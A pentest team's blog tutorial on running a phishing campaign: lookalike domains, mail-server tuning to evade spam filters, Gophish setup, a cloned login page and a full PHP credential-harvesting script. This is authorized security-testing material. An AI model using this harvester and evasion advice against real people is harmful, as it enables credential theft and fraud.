Phishing From Scratch – Awareness for business’ people

image

Préambule

This blog post is about a Phishing campaign that we have done in our pentester's team. We try our best to avoid being in the spams box by checking every useful requirements that may help us. During our first Phishing campaign, all worked perfectly without being in spams! But in the next one, we were blocked... That was really boring because our configuration seemed well implemented like the previous campaign. We asked arround us how our contact's team usualy do and many times the response was "We got whitelisted". Not to judge them or else (not our goal at all!), but we were like "Shit! But sure, it would be quicker!". As we still have time for this mission, we try to understand! We thought that during our settings, the malicous mails tested on the mail server have compromised our new domain name. Maybe it was because the web server hosted on the same mail server was also malicious and got blacklisted our IP address. It was probably a bit of this actually so we deciced to change the IP address restart the mail server configuration with the new one. Then, still blocked but not for the same reason! We were blocked because our domain name was "blacklisted because too new domain" and that's all! It means that all of our configuration was good! We deciced to send legit mails test and wait few days before starting the campaign, and everything went well! So as our Phishing Campaign was successful without any whitelisting on the client side, we decided to write this documentation and share it to the other pentester's team! As we did not have done it many times, we would appreciate your feedback to improve our next Phishing campaign! Do not hesitate :-)

Introduction

The goal of this documentation is to share with others pentesters’ teams knowledge on how to design and run efficient phishing campaigns. Of course, this is not made to help malicious people trying to do bad stuff.

As a pentesters’ team, we always try our best to be as realistic as possible to lure our clients’ employees into clicking on malicious links.

This requires to build a dedicated architecture and make sure our mails don’t end up in the spam box. And be as creative as possible writing the mail itself, so that recipients do fail into the trap!

We thank you in advance for your feedbacks that will help make this documentation better!

We will show you how to run phishing campaigns by:

  1. Buying and setting up a new beautiful domain name.
  2. Installing a mail server and configuring it in order to avoid finishing into the spams.
  3. Installing and configuring a phishing tool server named Gophish that will, among others stuffs, help you follow your campaign and get feedbacks on its efficiency.
  4. Writing a few web pages to trick the victim into giving up his credentials.

Requirements

The requirements needed for the phishing campaign are:

  • If possible, one server/IP by service exposed (SMTP/HTTPS).
  • A domain name bought a few days (let’s see bigger, two weeks) before starting the campaign. This is to avoid the new domain name to be blacklisted by major mail providers because it’s too new. The few first mails you sent using it must be as much legit as possible in order to not compromise the domain name and to gain the “trust” of mail providers.
  • A few TLS certificates for the HTTPS and SMTP servers.
  • Some basic skills in web development.

Let’s trick it: If, during your final tests, your mail still ends up in the spam box… Ask your client to whitelist your domain;-)

Domain Name

To start, we choose a domain name which will establish the link between the world and our server. If the real company has a website like https://example.com, the ideal would be to find a domain name which is close to the real in order not to raise suspicions.

They are several ways of doing so:

  • Choosing a domain name that looks similar to the target’s one.
  • Inserting special chars into the target’s domain name.
  • Using an international domain name, playing with the extension.

Find the good domain name

The goal is to pretend to be the real domain name.

Example: https://exanple.com instead of https://example.com (note the difference between letter ’n’ instead of ’m’).

It is also possible to assume to be a linked service of the organization like https://support-example.com. Despite the presence of the “support-“, the rest is identical and would seem valid for users not aware of phishing.

We can verify the availability of the domain name needed for the Phishing campaign on OVH for example.

Configuration

General considerations

It is recommended to have a VPS (Virtual Private Server) to configure it directly after the domain name has been purchased.

The modifications take time in order to be effective. We recommend you to start preparing everything almost a week or two before the beginning of your phishing campaign.

This seems a bit much but we prefer to add a few days of legit traffics to not have our new domain blacklisted. And remember, your domain may be blacklisted because it is too new.

image

Setting up the mail server

After the purchase, we go to the administration panel of the domain name and do some modifications on the DNS zone.

We delete all the ’A’ settings already added beforehand.

We next make the new domain name point to the public IP address of our VPS from an ’A’ entry (also called “host registry”).

It allows to link a (sub-)domain to an IP address. A basic configuration would have one ’A’ to support-example.com and
another ’A’ to www.support-example.com

image
image

Then, we add a new MX entry which will point to mail.support-example.com.

The MX (Mail Exchange) entry allows us to specify a server used to manage the domain mails. We will make mail.support-example.com point to our server.

image

Finally, we set up the reverse DNS that will make the server IP point back to the new domain name.

To add it, go to your hosting platform, connect into your account and from your instances add the reverse DNS on your IP address.

Example on Scaleway:

  1. Go to instance
  2. Go to Flexible IPs
  3. Click on the three points
  4. Click on Edit Reverse
  5. Add your domain name

The result would looks like:

// First request your domain
nslookup support-example.com

// You get something like this
Name : support-example.com Address : X.X.X.X

Mail Server configuration

Let’s continue with the mail application configuration. We choose PostFix as mail server (you can choose the mail server that you want).

There will have a few more DNS modifications to do on the OVH web administration panel following the mail server installation.

Package installation

Installation of the dependencies in one command line:

sudo apt-get install postfix opendkim opendkim-tools sasl2-bin libsasl2-modules postsrsd certbot dovecot-core dovecot-{core,common,imapd,pop3d} 

# postfix -> Mail server
# opendkim opendkim-tools -> Domain Keys Identified Mail
# sasl2-bin libsasl2-modules -> For the TLS (Transport Layer Security)
# postsrsd -> For the SRS (Sender Rewriting Scheme)
# certbot dovecot-core -> For the Let's encrypt certificates
# dovecot-{core,common,imapd,pop3d} -> For the authentication

Please, refer to the PostFix Configuration Part when prompted for the PostFix installation..

PostFix

It is the mail server, an open source project. It manages the mails deliveries.

OpenDKIM

The DKIM protocol (DomainKey Identified Mail) is one solution existing to authenticate the legit mails from the spam ones. It is a cryptography signature which is used to determine if the mails come from an authorized domain or not.

SASL2

SASL (Simple Authentication and Security Layer) is an authentication protocol described in the RFC 2222. It is implemented to allow the authentication to use an available mechanisms (PAM,LDAP,Shadow,…). It allows the users to send mails from the mail server.

PostSRSd

PostSRSd provides the SRS (Sender Rewriting Scheme) via TCP-based lookup tables for PostFix. SRS is needed if your mail server acts as forwarder.

Certbot

Certbot gives the free SSL/TLS certificates using the certbot client installed on the server.

Dovecot

Dovecot is an IMAP and POP3 service. Dovecot can be used by PostFix to identify the SMTP connections and manage the authentication SMTP, IMAP, POP3.

PostFix configuration

Just after the PostFix package installation, an interface appears to help us with the configuration.

We need to answer a few questions. It is possible that all the configuration options do not appear. If it is the case, we launch sudo dpkg-reconfigure postfix. But first: apt-install postfix

  • Type of mail configuration: Internet Website
  • System mail name: support-example.com
  • Postmaster recipient “account” (root, support …)
  • Destination to accept mail for: mydomain, myhostname, localhost.myhostname, localhost
  • Synchronous update on mail queue: no
  • Local network: 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
  • Mailbox size limit: 0
  • Local address extension character: +
  • Internet protocol to use: all

Now, we configure the directory to receive the mails:

sudo postconf -e 'home_mailbox = Maildir/'
# Maildir is a directory in $HOME, example:
# /root/Maildir
# /home/users/Maildir ...

In the file “/etc/postfix/main.cf“, we add our new domain information. The configuration almost allows us to send an email. At the top of the file, we modify/add the following variables:

myhostname = mail.support-example.com
myorigin = support-example.com
mydomain = support-example.com

Testing our mail

All along the process of setting up a phishing campaing, one needs to test it against spam detector to see how well it does. One can do so using the service mail-tester, that gives detailed feedbacks about what’s detected or not, thus allowing us to improve our configuration and templates.

Keep in mind that the few first mails may not have a good score as additional configuration will be needed.

image
sudo systemctl restart postfix.service
echo "Subject: hello" | sendmail test-bigm1n005@srv1.mail-tester.com

Let’s check the result on the mail-tester website using the server we just built. The first mail will give you a score and some comments helping you to modify wrong configuration on the mail server side.

image
image

We may encounter the error about the Rewrite Message-Id header.

Sometimes mail-tester may tell you:

Message-Id is not valid, according to RFC 2822

This is because the Message-Id header is not surrounded by “< >”. To change that, we need to create a regex for PostFix:

sudo vim /etc/postfix/main.cf
#At the end of the file add:
header_checks = regexp:/etc/postfix/header_checks

Then we need to create/edit the file that will contain the regex:

sudo vim /etc/postfix/header_checks
#Copy paste that line :
/Message-Id:\s+<(.*?)@HOSTNAME/ REPLACE Message-Id: <$1@support-example.com>
#Use your hostname instead of "HOSTNAME" and your domain name instead of our.

TLS

Generation of the Let’s Encrypt certificates that manage the TLS:

certbot certonly --standalone -d mail.support-example.com

Some choices are thus proposed, in order of appearance:

  • Enter your email address
  • A for Agree
  • To precise our configuration: Yes
  • (Optional?) Domain: mail.support-example.com
  • (Optional?) Mail contact: @support-example.com
  • (Optional?) Accept the conditions of use
  • (Optional?) HTTP + HTTPS: select ’secure’

From here, the HTTPS should be configured for our domain name. The certificates are stored in ’/etc/letsencrypt/live/support-example.com/’.

We add the certificates to the PostFix configuration:

sudo postconf -e 'smtpd_tls_cert_file = /etc/letsencrypt/live/support-example.com/fullchain.pem'
sudo postconf -e 'smtpd_tls_key_file = /etc/letsencrypt/live/support-example.com/privkey.pem'

We configure the SMTP authentication:

sudo postconf -e 'smtpd_sasl_type = dovecot'
sudo postconf -e 'smtpd_sasl_path = private/auth'
sudo postconf -e 'smtpd_sasl_local_domain ='
sudo postconf -e 'smtpd_sasl_security_options = noanonymous'
sudo postconf -e 'broken_sasl_auth_clients = yes'
sudo postconf -e 'smtpd_sasl_auth_enable = yes'
sudo postconf -e 'smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination'

We configure Dovecot and the virtual mapping of the aliases:

sudo postconf -e 'virtual_alias_domains = $mydomain'
sudo postconf -e 'virtual_alias_maps = hash:/etc/postfix/virtual'

We must create the file ’/etc/postfix/virtual’ to assign our mail addresses to the users by adding:

postmaster@support-example.com root
root@support-example.com root
support@support-example.com support

We restart the services:

sudo postmap /etc/postfix/virtual
sudo systemctl restart postfix.service

We create the user directories by starting with a new template:

sudo maildirmake.dovecot /etc/skel/Maildir
sudo maildirmake.dovecot /etc/skel/Maildir/.Drafts
sudo maildirmake.dovecot /etc/skel/Maildir/.Sent
sudo maildirmake.dovecot /etc/skel/Maildir/.Trash
sudo maildirmake.dovecot /etc/skel/Maildir/.Templates

We copy the directory into the user’s directory:

#We choose "contact" as username like contact@support-example.com
sudo adduser contact
sudo -u contact cp -r /etc/skel/Maildir /home/$USER/
sudo -u contact chown -R $USER:$USER /home/$USER/Maildir
sudo -u contact chmod -R 700 /home/$USER/Maildir
sudo adduser contact mail //add user contact to group mail
echo 'export MAIL=~/Maildir' | sudo tee -a /etc/bash.bashrc | sudo tee -a /etc/profile.d/mail.sh

Dovecot

Dovecot is an IMAP and POP3 service. Dovecot can be used by PostFix to identify the SMTP connections and manage the authentication SMTP, IMAP, POP3.

We edit the following values in the file ’/etc/dovecot/conf.d/10-auth.conf’:

disable_plaintext_auth = yes
auth_mechanisms = plain login

We setup the path for the mail directory in ’/etc/dovecot/conf.d/10-mail.conf’:

mail_location = maildir:~/Maildir
#You may need an absolute path: /root/Maildir

We configure the IMAP and POP3 protocols in ’/etc/dovecot/conf.d/10-master.conf’:

service imap-login {
   inet_listener imap {
      port = 143
   }
...
}
service pop3-login {
   inet_listener pop3 {
      port = 110
   }
   ...
}
...
service auth {
...
   # Postfix smtp-auth
   unix_listener /var/spool/postfix/private/auth {
      mode = 0660
      user = postfix
      group = postfix
}

We edit the file ’/etc/dovecot/conf.d/10-ssl.conf’ by adding our certificates:

ssl = required
...
ssl_cert = </etc/letsencrypt/live/support-example.com/fullchain.pem
ssl_key = </etc/letsencrypt/live/support-example.com/privkey.pem
...
# SSL protocols to use
ssl_protocols = !SSLv2 !SSLv3

We verify the configuration. If everything is good, we restart it:

dovecot -n
sudo systemctl restart dovecot.service

Bonus configuration

In the idea of having a good configuration, we will implement spams’ management on the server. It will ask for a SMTP connection followed by a EHLO/HELO, which will avoid some bot connection attempts.

Furthermore, we disable the command “VERIFY” which allow us to verify if the account exist on the server (username listing/bruteforce):

sudo postconf -e 'smtpd_helo_required = yes'
sudo postconf -e 'smtpd_helo_restrictions = reject_non_fqdn_helo_hostname,reject_invalid_helo_hostname,reject_unknown_helo_hostname'
sudo postconf -e 'disable_vrfy_command = yes'
sudo postconf -e 'smtpd_delay_reject = yes'
sudo postconf -e 'smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination,reject_invalid_hostname,reject_non_fqdn_hostname,reject_non_fqdn_sender,reject_non_fqdn_recipient,reject_unknown_sender_domain,reject_rbl_client sbl.spamhaus.org,reject_rbl_client cbl.abuseat.org'

OpenDkim

The DKIM (DomainKeys Identified Mail) is a method that identify the server to avoid ending up into the spams.

We open the file ’/etc/opendk2021-02-26_16-23im.conf’ and modify the values “Domain”:

Domain      support-example.com
KeyFile     /etc/postfix/dkim.key
Selector    mail
Socket      inet:8892@localhost # We can choose the port.

We configure the file ’/etc/default/opendkim’ by modifying the socket path (same as above):

SOCKET="inet:8892@localhost"

We modify the file ’/etc/postfix/main.cf’ by adding the DKIM configuration:

# DKIM
milter_default_action = accept
milter_protocol = 2
smtpd_milters = inet:localhost:8892
non_smtpd_milters = inet:localhost:8892

We create the DKIM key:

cd /home/contact/
opendkim-genkey -b 1024 -t -s mail support-example.com
sudo cp mail.private /etc/postfix/dkim.key

We get two files: mail.private and mail.txt.

The first one correspond to the private key that helps to sign the sent emails. The second one is useful to configure the DNS.

Back on the OVH web administration panel, we add a new TXT entry which will help the externals SMTP to verify our signature. We use the subdomain ’mail._domainkey’ and add in the value field, the content between double parentheses of the mail.txt file:

"v=DKIM1 ... 6MQxalkIQIDAQAB"
image
image

We restart both services and wait a bit that the DNS updates itself (few minutes):

sudo systemctl restart opendkim.service
sudo systemctl restart postfix

To test that our configurations are effective, we can use the mail-tester online tool one more time (you can wait as you will have only few free attempts on this tool – or you can pay to unlimited tries).

We query the DNS to check that the new TXT entry is now in the response:

dig mail._domainkey.support-example.com TXT
image

SPF

The SPF (Sender Policy Framework) is a verification norm of the domain name email sender, normalized in RFC 7208. The adoption of this norm is used to counter spams.

It is necessary to configure it on the OVH web administration panel by adding the following value in a new TXT entry:

v=spf1 a mx mx:mail.support-example.com
ip4:<IP of your server>
~all
image

OpenSRSd

Note: This part gave us some problems during our last phishing campaign. We did not find out what was the problem but when removing it, it did work (still having a good mail score). Thus, you may give it a try.

We install the OpenSRSd package that allows us to send some information on the user validity and about the domain name.

We modify the PostFix configuration by adding the following lines in the file ’/etc/postfix/main.cf’ at the end:

# POSTSRSD
sender_canonical_maps = tcp:localhost:10001
sender_canonical_classes = envelope_sender
recipient_canonical_maps = tcp:localhost:10002
recipient_canonical_classes= envelope_recipient,header_recipient

Then, we restart both services:

sudo systemctl restart postsrsd.service 
sudo systemctl restart postfix.service

DMARC

The DMARC is used to verify that a domain name is well authorized to send mails. It helps to tag the mails as spam if the DMARC is not configured.

We go to the OVH web administration panel to add a new TXT entry which contains our DMARC:

v=DMARC1;
p=quarantine;
pct=100;
rua=mailto:contact@support-example.com;
sp=quarantine;
aspf=r; 
image

We wait a bit that the DNS updates and then we send another mail on the online tool mail-tester.com to verify that our configuration have been taken.

Validating your set up

Using spam-testing services, as explained previously, your goal is now to be undetected on the platform you target. Check the errors detected by the website and change what’s needed. Normally, now you should get a strong score.

Phishing Tool – Gophish

The Gophish tool is available on Github and will help us to automate the Phishing attack. Thank you to the team who have developed this project!

This tool allows us (as example) to insert a victim email list and implement an email template to make this attack quicker.

Every actions can be taken from the web interface.

Before trying to send malicious emails from Gophish, we recommend you to send legit emails (legit content) from your server to avoid being blacklisted before your campaign.

Installation

We install go on our server: Go installation

Then download the last Gophish release from: https://github.com/gophish/gophish/releases/, and:

unzip gophish-v0.11.0-linux-64bit.zip
chmod u+x gophish
./gophish

You may need to run Gophish as root because it will bind on the port 80.

We configured it to run locally and not expose the service on internet. Thus, we need to forward the port to our local laptop and interact with the administration web interface:

ssh -f -N -L 8888:localhost:80 -i ~/.ssh/KEY USER@IP -p PORT

Then, we reach the web admin Gophish interface on http://localhost:8888/

Web server

To do a Phishing campaign, we need to set:

  • Users and groups
  • Email templates
  • Landing pages
  • Sending profiles

It is necessary to create a template in “Landing pages” in order to launch the Phishing campaign.

Gophish web interface looks like:

image

For the Users & Groups part, it is necessary to enter the victim email addresses or upload a CSV file:

image

As we want to import a target list from a CSV file, we need to be sure that the CSV has the following header value:

First Name,Last Name,Position,Email

See: https://docs.getgophish.com/user-guide/building-your-first-campaign/importing-groups

It is possible to use special value in the mail template like:

{{.FirstName}}
{{.LastName}}
{{.URL}}

This value will be replaced by either “First Name”, “Last Name” or the Phishing URL.

For the Email template, we must create the model to send to the victims.

To avoid finishing into the spams, we must complete both the “TEXT” and “HTML” sections:

image

Moreover, we can add some trackers in the HTML code to obtain better statistics as the number of opened emails. However, it may increase the rate detection to be considered as spam.

To end the setup, the Sending Profiles tab gathers the relative SMTP server information used to send the emails.

It is advised to create an “Email headers” of type X-Mailer with a value other than nothing (a space would work) in order to avoid having the default value to be “Gophish” that would be detected directly as malicious.

It is necessary to fill in the SMTP server as well as the system user credential who will send the emails.

The page mentioned looks like:

image

The last step would consist of clicking on the Campaigns tab and select the previous element just created to launch the attack:

image

Web Server configuration

Setup Apache HTTPS

We need to install Apache2:

sudo apt update
sudo apt install apache2
sudo apt install python-certbot-apache

We need to enable the required mod and restart Apache2:

sudo a2enmod ssl
sudo a2enmod rewrite
sudo systemctl restart apache2

We will setup the Apache2 virtual host that will contain the website:

sudo mkdir /var/www/support-example.com
touch /var/www/support-example.com/index.html
sudo chmod -R 750 /var/www/support-example.com
sudo chown www-data:www-data /var/www/support-example.com/ -R

We create the configuration file for the virtual host:

sudo vim /etc/apache2/sites-available/support-example.conf

We paste the following content:

<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    ServerName support-example.com
    ServerAlias www.support-example.com
    DocumentRoot /var/www/support-example.com
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

We can now enable our vhost and reload Apache2:

sudo a2ensite support-example.conf
sudo systemctl reload apache2

We will use certbot to create the certificate and set it on Apache2:

sudo certbot --apache -d support-example.com -d www.support-example.com
# If the certificate already exist your can use the "-duplicate" option

If you are prompted for, choose the “Redirect” option (to make all requests from HTTP redirected to HTTPS).

The VHOST should be accessible on https://support-example.com.

Login details stealing

Before starting the campaign, we must implement the server which will host the website to which victims will be redirected to.

Here is the following steps:

  • Copy and modify the targeted client website.
  • Create a web page that will capture the credentials.
  • Analyse the web logs to determine the number of clicks.
  • Redirect the user to a legit web page or something trustable.

The first step is easy, it is enough to include a POST request in the form.

We clone the website getting the HTML source code from the web console:

html = document.getElementsByTagName('html')[0].innerHTML
#Copy it into your main HTML web page

We may need to modify some links if not available. Maybe also adapt the content of the web page, but you will have the most of it.

Create a credible scenario to lure the victims:

  • Clone the client authentication web page.
  • Create a form directly accessible on the websit, on which you ask users’ credentials.
  • Do it in two steps: grab information first (mail/phone), then social engineering to get the password using the precious information got.
  • Be smart! And share it!;-)

An example of PHP web page to steal the credentials would looks like:

<?php
if (($_SERVER['REQUEST_METHOD'] === 'POST') && (isset($_POST['username'])) && (isset($_POST['password'])) ){

    $SITE="https://support-example.com/";
    $FILE="/path/to/logs.txt";
    $FILECSV="/path/to/logs.csv";
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    function getOS() { 
        global $user_agent;
        $os_platform  = "Unknown OS Platform";
        $os_array     = array(
            '/windows nt 10/i'      =>  'Windows 10',
            '/windows nt 6.3/i'     =>  'Windows 8.1',
            '/windows nt 6.2/i'     =>  'Windows 8',
            '/windows nt 6.1/i'     =>  'Windows 7',
            '/windows nt 6.0/i'     =>  'Windows Vista',
            '/windows nt 5.2/i'     =>  'Windows Server 2003/XP x64',
            '/windows nt 5.1/i'     =>  'Windows XP',
            '/windows xp/i'         =>  'Windows XP',
            '/windows nt 5.0/i'     =>  'Windows 2000',
            '/windows me/i'         =>  'Windows ME',
            '/win98/i'              =>  'Windows 98',
            '/win95/i'              =>  'Windows 95',
            '/win16/i'              =>  'Windows 3.11',
            '/macintosh|mac os x/i' =>  'Mac OS X',
            '/mac_powerpc/i'        =>  'Mac OS 9',
            '/linux/i'              =>  'Linux',
            '/ubuntu/i'             =>  'Ubuntu',
            '/iphone/i'             =>  'iPhone',
            '/ipod/i'               =>  'iPod',
            '/ipad/i'               =>  'iPad',
            '/android/i'            =>  'Android',
            '/blackberry/i'         =>  'BlackBerry',
            '/webos/i'              =>  'Mobile'
        );
        foreach ($os_array as $regex => $value)
            if (preg_match($regex, $user_agent))
                $os_platform = $value;
        return $os_platform;
    }
    function getBrowser() {
        global $user_agent;
        $browser        = "Unknown Browser";
        $browser_array = array(
            '/msie/i'      => 'Internet Explorer',
            '/firefox/i'   => 'Firefox',
            '/safari/i'    => 'Safari',
            '/chrome/i'    => 'Chrome',
            '/edge/i'      => 'Edge',
            '/opera/i'     => 'Opera',
            '/netscape/i'  => 'Netscape',
            '/maxthon/i'   => 'Maxthon',
            '/konqueror/i' => 'Konqueror',
            '/mobile/i'    => 'Handheld Browser'
        );
        foreach ($browser_array as $regex => $value)
            if (preg_match($regex, $user_agent))
                $browser = $value;
        return $browser;
    }
    $user_os        = getOS();
    $user_browser   = getBrowser();
    $VISIT=1;
    if (file_exists($FILE)){
        $file=fopen($FILE,'r');
        while(!feof($file))
        {
                $line=fgets($file);
            if ($line != ""){
                if(strstr($line, "Visit")){
                    $VISIT++;
                }
            }
        }
        fclose($file);
    } else {
        $VISIT=1;
    }
    $IP=$_SERVER['REMOTE_ADDR'];
    $DATE=date('d/m/Y H:i:s', time());
    $UA=$_SERVER['HTTP_USER_AGENT'];
    $NBVISIT=strval($VISIT);
    $USERNAME=$_POST['username'];
    $PASS=$_POST['password'];
    // Write into log
    $content= <<<EOT
-------------------------------                    
[+] Visit number: $NBVISIT
[?] IP public: $IP
[?] Date: $DATE
[?] Headers: $UA
[?] OS: $user_os
[?] Browser: $user_browser
[+] Account information
[?] Email: $USERNAME
[?] Password: $PASS
-------------------------------
EOT;
    $file=fopen($FILE, 'a');
    fwrite($file,$content);
    fwrite($file, "\n");
    fclose($file);

    // Write into CSV log
    $content= <<<EOT
$IP,$DATE,$UA,$user_os,$user_browser,$USERNAME,$PASS\n
EOT;
    $file=fopen($FILECSV, 'a');
    fwrite($file, $content);
    fclose($file);
}
?>

After that, we prepare an email on Gophish using the template associated to the campaign:

image

Once the campaign is launched, we can check out the logs and get the user login/password.

But some funny outputs may come into our logs as you can see on the next screenshot. (I think they got it!)

image

Remarks – Improvement

They are a lot of things that can be improved:

  1. Improve the web tracking (using Gophish or something else in the mail)
  2. Prepare responses and a plan in case of someone alerts others. Usually, you’ll be able to know that it happened as you should have control of one or more corporates emails;-) And there, be creative!
  3. We wait for yours!

So do not hesitate to contact us if you have some remarks, we would appreciate it!

Documentation

PostFix

http://www.postfix.org/postconf.5.html#smtpd_recipient_restrictionshttps://jichu4n.com/posts/custom-domain-e-mails-with-postfix-and-gmail-the-missing-tutorial

DKIM

https://help.ubuntu.com/community/Postfix/DKIM
https://easyengine.io/tutorials/mail/dkim-postfix-ubuntu
https://fr-wiki.ikoula.com/fr/Installer_DKIM_sur_Postfix_sous_Debian
https://lea-linux.org/documentations/Installer_DKIM-SPF_sous_Postfix
https://easyengine.io/tutorials/mail/dkim-postfix-ubuntu/

SPF

https://www.linuxbabe.com/mail-server/setting-up-dkim-and-spf/

DMARK

https://support.google.com/a/answer/2466563?hl=fr

TLS/Dovecot

https://mondedie.fr/d/5750-[Tuto]-Installer-un-serveur-de-mail-avec-Postfix,-Dovecot-et-Rainloop
https://upcloud.com/community/tutorials/secure-postfix-using-lets-encrypt/
https://michauko.org/blog/smtp-et-imap-via-ssl-tls-lets-encrypt-1778/

Gophish

https://getgophish.com/